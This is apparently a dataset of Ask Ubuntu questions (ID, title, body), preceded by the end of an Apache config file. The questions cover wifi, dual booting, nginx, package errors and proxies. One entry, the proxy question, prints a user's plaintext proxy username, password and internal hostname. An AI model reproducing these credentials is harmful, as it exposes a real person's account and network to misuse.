/var/www/ > options indexes followsymlinks allowoverride none require all granted < /directory > # < directory /srv/ > # options indexes followsymlinks # allowoverride none # require all granted # < /directory > # accessfilename : the name of the file to look for in each directory # for additional configuration directives . see also the allowoverride # directive . # accessfilename .htaccess # # the following lines prevent .htaccess and .htpasswd files from being # viewed by web clients . # < filesmatch `` ^\.ht '' > require all denied < /filesmatch > # # the following directives define some format nicknames for use with # a customlog directive . # # these deviate from the common log format definitions in that they use % o # ( the actual bytes sent including headers ) instead of % b ( the size of the # requested file ) , because the latter makes it impossible to detect partial # requests . # # note that the use of % { x-forwarded-for } i instead of % h is not recommended . # use mod_remoteip instead . # logformat `` % v : % p % h % l % u % t \ '' % r\ '' % > s % o \ '' % { referer } i\ '' \ '' % { user-agent } i\ '' '' vhost_combined logformat `` % h % l % u % t \ '' % r\ '' % > s % o \ '' % { referer } i\ '' \ '' % { user-agent } i\ '' '' combined logformat `` % h % l % u % t \ '' % r\ '' % > s % o '' common logformat `` % { referer } i - > % u '' referer logformat `` % { user-agent } i '' agent # include of directories ignores editors ' and dpkg 's backup files , # see readme.debian for details . # include generic snippets of statements includeoptional conf-enabled/*.conf # include the virtual host configurations : includeoptional sites-enabled/*.conf # vim : syntax=apache ts=4 sw=4 sts=4 sr noet
403070	the `` airodump-ng mon0 '' is returning there 's no channel or device	i am using ubuntu 12.04 having problems . when i enter airodump-ng mon0 it shows the device not found or there 's no device . should i have to give the driver name in aitmon-ng start wlan0 command ?
403071	very slow wireless connection	i 'm very naive to the ways of ubuntu . my problem is that no matter which release i use , my wifi connection is very slow ( ca n't stream anything , pages load slowly , etc. ) . however , when plugged into the router the speed is very fast/as it should be . brandt @ brandtsys : ~ $ sudo lshw -c network [ sudo ] password for brandt : *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 05 serial : f0 : de : f1:71:62:57 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8105e-1.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:42 ioport:1000 ( size=256 ) memory : f0004000-f0004fff memory : f0000000-f0003fff *-network description : wireless interface product : rt3090 wireless 802.11n 1t/1r pcie vendor : ralink corp. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 00 serial : cc : af:78:68:28:7c width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rt2800pci driverversion=3.11.0-15-generic firmware=0.34 ip=192.168.1.67 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:18 memory : f0100000-f010ffff brandt @ brandtsys : ~ $ details : os ubuntu 13.10 memory 5.3 gib processor amd a6-3400m apu with radeon ( tm ) hd graphics ă 4 gallium 0.4 on amd sumo os type 64-bit disk 732.5 gb i have scoured google and searches http : //pastebin.com/nqjke0hr
403076	how to enable any media playback	i just installed 13.10 and now , can not get any media -- dvd nor cd -- to work . have vlc installed , have parole . neither will play dvd . have run a plethora of sudo apt-get install programs . started with sudo apt-get install libdvdread4 ... sudo /usr/share/doc/libdvdread4/install-css.sh . dvd still does n't work . system is hp 2000-210us . tried to rip a cd to music file , it said it ripped it , have yet to find where it 's at ? ( no , it 's not in the music file -- where it should be ) . *-disk description : ata disk product : st980811as vendor : seagate physical i.d . 0.0.0. bus info : scsi @ 0:0.0.0. logical name : /dev/sda version : 3.al serial : 3ly0746d size : 74 gib ( 80gb ) capabilities partitioned partitioned : dos configuration : ansiversion=5 sectorsize=512 signature=0001ef03 *-cd-rom description : dvd-ram writer product : cddvdw ts-l633r vendor : hp physical i.d . : 0.0.0. bus info : scsi @ 1:0.0.0. logical name : /dev/cdrom logical name : /dev/sro version : 0400 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=ready *-medium physical i.d . 0 logical name : /dev/cdrom the readout above is result of requested operation . (
403079	is a windows xp running on a virtual box with guest additions harmful for ubuntu ? does it may lead to viruses issues ?	i am new to ubuntu and after some month and a half running it side by side with windows 7 i decided that it would be my main system , and so i just formatted the machine and installed it as the only os . however , i still need to run some stuff that do n't have options for ubuntu , just like netflix or to manage my windows phone system . as a solution , i am thinking about running windows xp on a vm , i just installed virtualbox , but after some searching i saw that the best perfomance would be obtained if i install the guest additions . i do n't intend to share folders , although i am concerned if installing guest additions would somehow expose my linux system to windows viruses . and i will probably use the network through windows xp vm either , but i wo n't surf on the web , i 'll only eventually use netflix . well , the question literally is , as said on the title , is windows xp running on a virtual box with guest additions harmful for ubuntu ? does it may lead to viruses issues ?
403080	my ubuntu decided to remove itself	one week ago , my ubuntu has died . that day , i decided to do smth ( i ca n't remember , what exacly i wanted to ) . and to do this i was informed by system to update libc++ to newer version . as aptitude cuffed me trying to do that `` global '' update , i understood , that it should be done manually only . so , when i tried this : sudo apt-get remove libc++* i pressed enter and went to kitchen to take a coffee . so , it was very stupid by my side , 'cause when i returned back , my jowl just fell off : when i accepted the removing of libc++ , i skipped my favourite f***ing autoremove function . it said , that it also gon na remove nearly all the system . package-by-package . and when i saw this , it was too late `` to say goodbye '' . everything important already was in the underworld ( sating `` important '' i mean aptitude , apt and dpkg ) . thank god , that autoremove does n't remove old files and documents from the hard drive , or now i have to become a corpse . by some unknown to me super power of magics , by rebooting , dpkg recovered by ubuntu automatically ( it started to set it up back ) . but with the other deleted packages , it was not do the same magic . and for a week till now i 'm trying to recover aptitude or apt-get . and all my tryings are vainly . i ca n't find packages with the same version was installed . these stupid dependencies . how can i recover these packages back into system ?
403094	dualboot win8.1 and ubuntu13.10 already have 4 primary partitions	i have a toshiba satellite l855-150 and i would like to install ubuntu without erasing my windows8.1 installation . the problem is i have four primary partitions on my laptop which are : -msftres -msftdata -boot -hidden , diag ( ? ) ( these are the tags that show up in gparted . i would have posted a screenshot but i ca n't find it anywhere ... ) how do i proceed to install ubuntu next to win8.1 on my laptop ?
403097	better file previewer than gnome-sushi in 13.10 ?	i 'm looking for a better file previewer than gnome-sushi in ubuntu gnome 13.10 . i used to have gloobus preview , but that does n't have a version yet for 13.10.. the thing that annoys me the most about sushi is that it does n't continue to preview the rest of the folder after playing the file requested for preview ( very annoying when listening to an album , with gloobus that went flawlessly ) . anyone has a good alternative ?
403100	how to configure system wide proxy with user authentication	i would like to use my lan 's proxy server in ubuntu desktop 12.04 , but all my attempts have failed . here is what i did : 1 ) i went to system settings menu > network , selected network proxy , manual and entered the proxy address and port for http and https , and clicked apply system wide . in this dialog box there 's no way to enter authentication information ( in previous versions of ubuntu there was a details button ) . 2 ) when i start firefox a dialog box appears asking for authentication information . i enter `` sc\ws662sc '' for the user name and `` mypass81 '' for password ( and click remember password ) and the browser is connected to the internet . 3 ) after that i go to the terminal and try : sudo apt-get update but always get the error `` 407 proxy authentication required '' . 5 ) i edited the config file with : sudo gedit /etc/apt/apt.conf to include the user and password info , as follows : acquire : :http : :proxy `` http : //gcdomain\w66gc : mypass81 @ pt-tmg.gc.gsc.int:3128/ '' ; acquire : :https : :proxy `` https : //gcdomain\w66gc : mypass81 @ pt-tmg.gc.gsc.int:3128/ '' ; even after i do this firefox keeps asking for authentication info , and still get the 407 error in apt-get ! also tried to put the proxy config file inside apt.conf.d ( as some suggest for the same problem ) , but did n't work either . do n't know what else to do ... thank you for any help .
403102	ubuntu server installed , but graphical anomalies upon restart	i have successfully installed ubuntu server onto a dedicated pc ... . it is an old lenovo desktop . i have a generic 17 '' vga monitor attached to it . the install process completed successfully , but then when the system restarted , after a few seconds , the characters on the screen turned into giant chunky white blotches , rendering it impossible to read any of the text as it scrolls on the screen . the screen seems to refresh , with the background turning white , and the characters inverted to black , somehow reversed , and still unreadable . i am imagining this is some kind of error with graphic modes , but i went through the installation three times so far , just to make sure i did n't miss anything , and there were no options presented to adjust display settings . at this point it is impossible to read anything on the screen , so it would be impossible to enter any commands or to read the results of those commands . does anyone have any clue what is going on here , or what i can do to fix this ? ? i 'm doing this to try and get a fog server installed . but at this rate i 'm going to have to scrap ubuntu and explore a windows option . any help would be appreciated ! !
403103	the ubuntu stuck on boot screen , terminal works but gui does n't	i just performed a clean installation on my computer , and it stuck on the loading screen at first startup . however , the terminal still works . i have tried update the graphic drivers ( nvidia gtx 760 ) , but it did not work . what should i do ?
403104	dualboot ubuntu13.10 and win8.1 already have 4 primary partitions	i have a toshiba satellite l855-150 and i would like to install ubuntu without erasing my windows8.1 installation . the problem is i have four primary partitions on my laptop which are : how do i proceed to install ubuntu next to win8.1 on my laptop ? which one of the four primary partitions can i erase to install ubuntu ?
403105	usbs wo n't boot on mac-workaraound ?	downloaded 12.04 with unetbootin to my mac-mini to put onto a flash drive . after flash drive is fully loaded , get message saying said flash drive will not boot on a mac . ( am running os-x 10.7.5 . ) i also tried the instructions on the ubuntu web page to create a bootable flash drive . these instructions are way too complicated for me . after going to `` terminal '' , i get lost . downloaded refit also . are there `` easier '' ways to create bootable flash drives of ubuntu for mac ? thanks ! thanks !
403106	network manager does not see wireless networks	i am using lubuntu 13.10 and i can see some wireless networks via network manager , however i can not see many wireless networks when compared with iwlist so i can not connect to wireless . any suggestions to fix this ?
403113	how do you enable tap-to-click via command line , with `xmodmap` ?	you can use this to reverse scroll direction ( natural scroll ) : xmodmap -e `` pointer = 1 2 3 5 4 7 6 8 9 10 11 12 '' you can also set it back again with xmodmap -e `` pointer = 1 2 3 4 5 7 6 8 9 10 11 12 '' and this to switch the left and right buttons : xmodmap -e `` pointer = 3 2 1 '' and change it back with xmodmap -e `` pointer = 1 2 3 '' but how do you enable tap to click from command line ? preferably with one command , and not permanently . by the way , yes i do know this exists :
403123	laptop heating lenovo z570	i have just started using ubuntu . loving the way it works but i am having issue with heating . it is being heating more than it did when i had windows 7 installed . not sure if its problem of drivers as i have installed drivers when it promoted for my nvidia graphics card . i have two graphics card , intel hd 3000 and nvidia one . please help me with this . i think due to this heating issue i am also getting low battery backup . the battery drains much faster . lenovo z570 12.04 lts
403143	setting up gdb pretty printing in ubuntu 13.10	i tried to set up gdb pretty printing ( for easier work with standard containers ) according to this anwer . instead of using python pretty printers code from svn i used the ones that ship with ubuntu . after going through the rest of the process i ended up with the following error message when launching gdb : for bug reporting instructions , please see : < http : //www.gnu.org/software/gdb/bugs/ > ... traceback ( most recent call last ) : file `` < string > '' , line 3 , in < module > file `` /home/nietaki/gdb_printers/python/libstdcxx/v6/printers.py '' , line 54 raise valueerror , `` can not find type % s : : % s '' % ( str ( orig ) , name ) ^ syntaxerror : invalid syntax /home/nietaki/.gdbinit:6 : error in sourced command file : error while executing python code . after looking a little deeper into the problem i found out the root cause lays deeper - python 3 used in gdb is incompatible with libstdc++ pretty printers . does anyone have a functional workaround for that ? for now i 'm stuck with the ( also useful , but not as functional ) helpers from dan marinescu : http : //www.yolinux.com/tutorials/gdb-commands.html # stlderef
403148	screenlets ppa missing on 13.04	when running a 'sudo apt-get update ' i keep getting the following w : failed to fetch http : //ppa.launchpad.net/screenlets/ppa/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found i 've looked in http : //ppa.launchpad.net/screenlets/ppa/ubuntu/dists but there is no saucy directory and noticed that screenlets.org is offline . not sure if both are related .
403152	codelite can not build	i need your help in configuring codelite and clang or gcc or g++ . i have installed clang and build essential . that means i have pretty much installed all i need . but codelite can not build my applications .
403156	dual boot keeps restarting my computer 12.04	i have just installed 12.04 with wubi on windows 7 . installed fine but after restart on boot option , when i choose ubuntu to boot , it just restarts my computer rather than boot into ubuntu . please help me .
403169	ubuntu 13.10 gnome	i am wondering if installing the gnome desktop environment from ubuntu software center will cause my whole operating system to crash ? i know this sounds a bit weird but , couple of days ago , my father who had the ubuntu 12.04 lts installed on his desktop pc tried to switch from unity to gnome environment following the steps given in this link : http : //www.ubuntugeek.com/how-to-install-classic-gnome-desktop-in-ubuntu-12-04-precise.html neither of us is sure what happened , but after a few days using gnome when he turned on his pc , there was something like a `` black screen of death '' ... ... bunch of fixes that were going on and we had to wait for about half an hour pressing `` y '' to proceed with every fix being done at the time . my father blamed the gnome fallback session for causing the problem but i am somehow not quite convinced that this was the actual problem . anyway , i find the gnome desktop environment much more useful for my purpose . so will i experience the very same problem my father had on 12.04 if i try out gnome on my laptop running 13.10 ?
403171	shotwell reboots ubuntu 13.10	i have a fresh install of ubuntu 13.10 on a brand new hard disk . my computer restarts after a few minutes i open shotwell , which every time is importing my large pictures library ( 150gb ) . i do have 29gb of free space in my /home , where the pictures directory resides . i have checked other posts about log files and none seem to point me to finding the root cause of the restarts . can someone guide me on this ?
403173	what 's the ideal pc specs having ubuntu 12.07 lts ?	what 's the ideal pc specs having ubuntu 12.07 lts ? i 'm currently saving up and building my own pc . what specs / hardware should i be aiming for ?
403179	[ help/12.04 alert ! /dev/mapper/ ... does not exist ! dropping into a shell !	i 'm having an issue with my 12.04 lts install . i plugged in my phone and turned on my computer and noticed that it was n't accepting my password to decrypt the volume since i had done the full disk encryption . i was wondering why it was n't accepting it , but i realized that it was n't pointing to my usual name of what i believed the volume was called . i can only assume that ubuntu for some reason was trying to having me log into the mounted volume of my phone . i 've tried plugging in my phone again , unplugging it , and everything to try and get my computer working to no avail . can someone please help me ? i 've tried using boot-repair using a livecd but that did n't do anything . after failing three times ( while knowing full well that the password is correct ) , i get dropped into an initramfs command prompt . the screen reads : gave up waiting for root device . common problems : - boot args ( cat /proc/cmdline ) - check rootdelay= ( did the system wait long enough ? ) - check root= ( did the system wait for the right device ? ) - missing modules ( cat /proc/modules ; ls /dev ) alert ! /dev/mapper/yoursystemname-root does not exist . dropping to a shell ! busybox v1.18.5 ( ubuntu 1:1.18.5-1ubuntu4.1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . here 's some pics of interest :
403182	i accidentally changed the gnome panel background color , how can i change it back ?	so i accidentally dragged an image onto the top bar and it changed the background to that image . i looked into the appearance settings , changed themes , and the image is still there . is there anyway to reset it ?
403187	installarchives ( ) failed : dpkg : dependency problems prevent configuration of `` package ''	every time i attempt to use the ubuntu software center , i get an error message that says `` items can not be installed or removed until the package catalog is repaired '' . when i try to repair , it then says `` the installation or removal of a package failed '' . under details , it says : installarchives ( ) failed : dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.2.0.38.46 ) ; however : version of linux-image-generic on system is 3.2.0.58.69. linux-generic depends on linux-headers-generic ( = 3.2.0.38.46 ) ; however : version of linux-headers-generic on system is 3.2.0.58.69. dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : linux-generic error in function : dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.2.0.38.46 ) ; however : version of linux-image-generic on system is 3.2.0.58.69. linux-generic depends on linux-headers-generic ( = 3.2.0.38.46 ) ; however : version of linux-headers-generic on system is 3.2.0.58.69. dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured thanks for any help that can be provided .
403197	unable to update , live usb	update to 64-bit 12.04lts fails . i remade the liveusb once using startup disk creator , and twice using unetbootin . i then , thinking it was the usb , used a different one using unetbootin . also a failure . i have an hp 2000-2d69nr notebook pc , 1.75ghz amd e2-2000 cpu , 4gb ram , amd radeon hd 7340 discrete-class graphics , 500gb hdd .
403204	nginx processes have disappeared - why ?	i 've been following the arts technica web served series which has been great at teaching me how to get an nginx server established on a fresh ubuntu 12.04 server . i 'm having a few problems however . initially after establishing the server over lan , going to 192.168.1.10 ( the server address ) would get me the default nginx page . everything seemed to be going to plan , with the slight exception that changing the try files setting in /etc/nginx/sites-available/www to : location / { try_files $ uri $ uri/ =404 ; } failed to produce any change ( i 'd expected the default nginx to change to 404 when i went to 192.168.1.10 still i went on . now at some point something else seems to have gone wrong , and going to 192.168.1.10 just gets me a horrible unable to connect page : i thought i 'd check that nginx was running so checked on the server with : ps -e | grep nginx to my surprise this returned nothing where as before it had returned : 1793 ? 00:00:00 nginx 1794 ? 00:00:00 nginx 1795 ? 00:00:00 nginx 1796 ? 00:00:00 nginx 1797 ? 00:00:00 nginx i 've tried running nginx as my user , with sudo and as root . it just keeps telling me : nginx : [ emerg ] `` keepalive_timeout '' directive is duplicate in /etc/nginx/nginx.conf:26 which means it 's running , no ? so where are my workers ! ? not sure if this is behind the sudden unable to connect problem , or if that 's more to do with a mistake i inevitably made in the conf.d file or my www sites-available file . either way i 'm not really sure how to begin troubleshooting to try and isolate and diagnose the problem ... and googling 'nginx du n't work no more ' is n't getting me too far ... here 's the dump from /etc/nginx/sites-available/www code . # you may add here your # server { # ... # } # statements for each of your virtual hosts to this file # # # you should look at the following url 's in order to grasp a solid understanding # of nginx configuration files in order to fully unleash the power of nginx . # http : //wiki.nginx.org/pitfalls # http : //wiki.nginx.org/quickstart # http : //wiki.nginx.org/configuration # # generally , you will want to move this file somewhere , and start with a clean # file but keep this around for reference . or just disable in sites-enabled . # # please see /usr/share/doc/nginx-doc/examples/ for more detailed examples . # # server { listen 80 default_server ; listen [ : : ] :80 default_server ipv6only=on ; root /usr/share/nginx/html ; index index.html index.htm ; # make site accessible from http : //localhost/ server_name localhost ; location / { # first attempt to serve request as file , then # as directory , then fall back to displaying a 404. try_files $ uri $ uri/ =404 ; allow 192.168.1.4 ; allow 127.0.0.1 ; # uncomment to enable naxsi on this location # include /etc/nginx/naxsi.rules } location ~ \.php $ { try_files $ uri =404 ; allow 192.168.1.0/10 ; allow 127.0.0.1 ; deny all ; include fastcgi_params ; fastcgi_pass php5-fpm-sock ; fastcgi_param script_filename $ document_root $ fastcgi_script_name ; fastcgi_intercept_errors on ; } } server { listen 443 ssl ; root /usr/share/nginx/html ; index index.html index.htm ; server_name [ myserver.co.uk ] ; ssl on ; ssl_certificate /etc/nginx/ssl/ssl-unified.crt ; ssl_certificate_key /etc/nginx/ssl/ssl.key ; ssl_protocols sslv3 tlsv1 tlsv1.1 tlsv1.2 ; ssl_ciphers ecdhe-rsa-aes256-sha384 : aes256-sha256 : rc4 : high : ! md5 : ! anull : ! edh : ! aesgcm ; ssl_prefer_server_ciphers on ; ssl_ecdh_curve secp521r1 ; location ~ \.php $ { try_files $ uri =404 ; allow 192.168.1.0/24 ; allow 127.0.0.1 ; deny all ; include fastcgi_params ; fastcgi_pass php5-fpm-sock ; fastcgi_param script_filename $ document_root $ fastcgi_script_name ; fastcgi_intercept_errors on ; fastcgi_param https on ; } } # only for nginx-naxsi used with nginx-naxsi-ui : process denied requests location /requestdenied { proxy_pass http : //127.0.0.1:8080 ; } error_page 404 /404.html ; # redirect server error pages to the static page /50x.html # error_page 500 502 503 504 /50x.html ; location = /50x.html { root /usr/share/nginx/html ; } # pass the php scripts to fastcgi server listening on 127.0.0.1:9000 # # location ~ \.php $ { # fastcgi_split_path_info ^ ( .+\.php ) ( /.+ ) $ ; # # note : you should have `` cgi.fix_pathinfo = 0 ; '' in php.ini # # # with php5-cgi alone : # fastcgi_pass 127.0.0.1:9000 ; # # with php5-fpm : # fastcgi_pass unix : /var/run/php5-fpm.sock ; # fastcgi_index index.php ; # include fastcgi_params ; # } # deny access to .htaccess files , if apache 's document root # concurs with nginx 's one # # location ~ /\.ht { # deny all ; # } } # another virtual host using mix of ip- , name- , and port-based configuration # # server { # listen 8000 ; # listen somename:8080 ; # server_name somename alias another.alias ; # root html ; # index index.html index.htm ; # # location / { # try_files $ uri $ uri/ =404 ; # } # } # https server # # server { # listen 443 ; # server_name localhost ; # # root html ; # index index.html index.htm ; # # ssl on ; # ssl_certificate cert.pem ; # ssl_certificate_key cert.key ; # # ssl_session_timeout 5m ; # # ssl_protocols sslv3 tlsv1 ; # ssl_ciphers all : ! adh : ! export56 : rc4+rsa : +high : +medium : +low : +sslv3 : +exp ; # ssl_prefer_server_ciphers on ; # # location / { # try_files $ uri $ uri/ =404 ; # } # } any advice ?
403206	very long shutdown delay on 13.10	whenever i shutdown or reboot , there is a very long delay ( several minutes ) before the system will shutdown . i was getting a nm-dispatch signal 15 so i thought the problem might be with network manager . i purged network manager but it did n't help . the message i get while shutting down is `` killing all remaining processes ... [ fail ] '' with no further information . if i do n't hit up-arrow right away , i get the ubuntu logo dots screen and they all remain white . there is nothing in /var/crash things i 've tried : shutdown does not power off computer asking all remaining processes to terminate ... fail removing both network-manager and modem-manager fresh install disabling networking how to troubleshoot slow shutdown ? what can i do ? how can i tell what is causing the hangup ? update : i just did a fresh install , and this problem happens on the first reboot after the install .
403213	how do i fix unity from freezing and artifacts on my screen when i 'm charging my laptop ?	i woke up this morning to find my computer frozen and my graphics were not rendering correctly either . i had to press ctrl + alt + f1 to regain control of the system . at first i thought it was my nvidia drivers , because some times they mess up when my screen goes to sleep , because i have a dual monitor set up with 1080p and when nvidia detects my monitors it detects them wrong and resizes my display , which crashes compiz . but this time i do n't think that is the issue . i recently upgraded my kernel to 3.2.0-58-generic and when that happened it did n't finish the post install correctly . my theory is that the nvidia kernel module did n't update . so i tried to install the drivers from nvidia . i could n't get them to work so i ended up removing them and reinstalling the ubuntu nvidia-current and nvidia-settings packages . this brought my system back up . but i 'm still experiencing the same issue with my screen freezing , and artifacts displaying on the screen , with or without the second monitor . i have started to suspect my hardware mainly graphics card or power supply . it seems if i remove the power supply and run off of battery it runs just fine . so i thought perhaps my power supply is supplying dirty power , so i swapped it out with a new one , but i 'm still experiencing the same issue with a different power supply . how do i fix unity from freezing and artifacts on my screen when i 'm charging my laptop ? i 'm running a system 76 gazp6 on ubuntu 12.04 kernel 3.2.0-58-general nvidia geforce gtx 560m here is some information from my xorg.0.log that may help : [ 1074.299 ] [ mi ] eq overflowing . additional events will be discarded until existing events are processed . [ 1074.299 ] backtrace : [ 1074.321 ] 0 : /usr/bin/x ( xorg_backtrace+0x26 ) [ 0x7f5099a05a86 ] [ 1074.321 ] 1 : /usr/bin/x ( mieqenqueue+0x263 ) [ 0x7f50999e6163 ] [ 1074.321 ] 2 : /usr/bin/x ( 0x7f509987d000+0x62a44 ) [ 0x7f50998dfa44 ] [ 1074.321 ] 3 : /usr/bin/x ( xf86postmotionevent+0xd8 ) [ 0x7f509991d128 ] [ 1074.321 ] 4 : /usr/lib/xorg/modules/input/synaptics_drv.so ( 0x7f5091668000+0x4148 ) [ 0x7f509166c148 ] [ 1074.321 ] 5 : /usr/lib/xorg/modules/input/synaptics_drv.so ( 0x7f5091668000+0x61b0 ) [ 0x7f509166e1b0 ] [ 1074.321 ] 6 : /usr/bin/x ( 0x7f509987d000+0x8af47 ) [ 0x7f5099907f47 ] [ 1074.321 ] 7 : /usr/bin/x ( 0x7f509987d000+0xb0d4a ) [ 0x7f509992dd4a ] [ 1074.321 ] 8 : /lib/x86_64-linux-gnu/libpthread.so.0 ( 0x7f5098ba3000+0xfcb0 ) [ 0x7f5098bb2cb0 ] [ 1074.321 ] 9 : /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so ( 0x7f50925e8000+0x13abf1 ) [ 0x7f5092722bf1 ] [ 1074.321 ] 10 : /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so ( 0x7f50925e8000+0x1450a7 ) [ 0x7f509272d0a7 ] [ 1074.321 ] 11 : /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so ( 0x7f50925e8000+0x146f48 ) [ 0x7f509272ef48 ] [ 1074.321 ] 12 : /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so ( 0x7f50925e8000+0x148001 ) [ 0x7f5092730001 ] [ 1074.321 ] 13 : /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so ( 0x7f50925e8000+0x14b8f5 ) [ 0x7f50927338f5 ] [ 1074.321 ] 14 : /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so ( 0x7f50925e8000+0x16a9ed ) [ 0x7f50927529ed ] [ 1074.321 ] 15 : /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so ( 0x7f50925e8000+0x135eb4 ) [ 0x7f509271deb4 ] [ 1074.321 ] 16 : /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so ( 0x7f50925e8000+0x4acd42 ) [ 0x7f5092a94d42 ] [ 1074.321 ] 17 : /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so ( 0x7f50925e8000+0x4b82e1 ) [ 0x7f5092aa02e1 ] [ 1074.321 ] 18 : /usr/bin/x ( 0x7f509987d000+0x4e8a1 ) [ 0x7f50998cb8a1 ] [ 1074.321 ] 19 : /usr/bin/x ( 0x7f509987d000+0x3d7ba ) [ 0x7f50998ba7ba ] [ 1074.321 ] 20 : /lib/x86_64-linux-gnu/libc.so.6 ( __libc_start_main+0xed ) [ 0x7f5097a2376d ] [ 1074.321 ] 21 : /usr/bin/x ( 0x7f509987d000+0x3daad ) [ 0x7f50998baaad ] [ 1074.321 ] [ mi ] these backtraces from mieqenqueue may point to a culprit higher up the stack . [ 1074.321 ] [ mi ] mieq is *not* the cause . it is a victim .
403215	no network out of the sudden on ubuntu 12.10	recently , i replaced my network card and had few issues with the new card and the network connection on the office intel xeon 5500/core i7 white box server running 64-bit ubuntu 12.10 . i ended up uninstalling the network manager and set the network from /etc/network/interfaces . so far so good . then i started to recognize that static ip becomes dynamic automatically ! i had to manually shift from bring the network down ( by ifdown eth0 ) and get it back up ( by ifup eth0 ) at first . after some research i ended up uninstalling the dynamic ip ( dhcp option ) and that fixed the problem . the server was always on static ip . everything was perfect for about a month . after the holidays i came back to office and now there is no connection at all ! : ( from /etc/network/interfaces : # the loopback network interface auto lo iface lo inet loopback auto eth0 # iface eth0 inet dhcp iface eth0 inet static address 128.95.165.148 netmask 255.255.255.0 network 128.95.165.0 broadcast 128.95.165.255 gateway 128.95.165.100 dns-morgul 128.95.120.1 129.95.112.1
403218	having issue with ubuntu and windows 7 networking	i am running a game server in ubuntu while running the client on a windows 7 machine ( macbook pro running windows 7 ) . the problem is that i can not ping my ubuntu machine from the windows 7 and vice versa . my windows machine and ubuntu machine is in the same wireless network . previously it used to work fine ( i had to disable wireless isolation in my router ) . for some strange reason , it is not working during the past two to three days . my windows network configuration is ip : 192.168.0.3 mask : 255.255.255.0 firewall is disabled . ubuntu network configuration is ip : 192.168.0.5 bcast : 192.168.0.255 mask : 255.255.255.0 ifconfig | grep inet inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host inet addr:192.168.0.5 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :221:6bff : fe92 : e80c/64 scope : link question : do i need to install samba for windows7-ubuntu network ? previously when i have a shared ubuntu folder , i think samba has been installed automatically . ( i may be wrong ) thanks .
403221	lenovo t410 problem with `` wpa & wpa 2 enterprise '' in 13.10	this is a fresh install of ubuntu 13.10 on a completely wiped clean hard disk . dual booted with windows 7 ( boths oss freshly installed ) . the install is on ext 4 partition . and my university uses wpa2 enterprise i believe - peap with mschapv2 . win 7 connects flawlessly and works fine . ubuntu works flawlessly with the open guest netowrk of university but not the secured one . it connects fine , and will work for 10-20 seconds but then internet is lost . no ping to www.google.com . however , the network still remains connected . if i disconnect and reconnect to the wifi netowrk again , the internet will work for another 10-15 seconds before being lost . the wifi adapter i believe is `` intel centrino ultimate-n 6300 '' . here is the *-network description : wireless interface product : centrino ultimate-n 6300 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 35 serial : 00:24 : d7:38:97 : c4 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.11.0-12-generic firmware=9.221.4.1 build 25532 ip=10.101.160.224 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:44 memory : f2000000-f2001fff
403222	kill off apache processes when memory usage hits 90 %	my situation is following : we run magento professional on a 15gb ram instance , rackspace . when running htop , we could see that 'apache2 -k start ' keeps spawning more child processes , some of them eats ~900mb of memory . when memory is almost used up , all sites time out or become very slow . when memory is all used up , it seems that some of these processes got killed to free memory . then the same procedures happen . my question is , could we setup ubuntu / apache to kill off child processes and free memory when memory usage reaches 85-90 % ?
403231	software center crashed twice , works but wont show reviews . fresh install of 12.04	i 'm relatively new to ubuntu , been using it for about a month . i decided to try something new today and downloaded the kubuntu-desktop and hated it . after unsuccessfully attempting to remove it i decided to do a fresh install again . upon installation , the software center crashed , i sent an error report and tried again . it crashed again , i sent another report . i uninstalled/reinstalled the software center , it opens without crashing , downloads stuff fine but wont show reviews , says theres no network connection/connect to see more reviews . it may be a trivial thing but its nagging at me because before i messed with the kubuntu desktop earlier , everything was perfect for the past month . any help would be greatly appreciated , thanks from terminal : @ allonsy : ~ $ software-center 2014-01-09 23:40:31,161 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2014-01-09 23:40:31,166 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2014-01-09 23:40:31,604 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2014-01-09 23:40:31,745 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2014-01-09 23:40:31,790 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) 2014-01-09 23:40:35,152 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/share/software-center/softwarecenter/utils.py ' , 201 , 'get_title_from_html ' ) ' 2014-01-09 23:40:35,152 - root - warning - failed to parse : ' < div style= '' background-color : # 161513 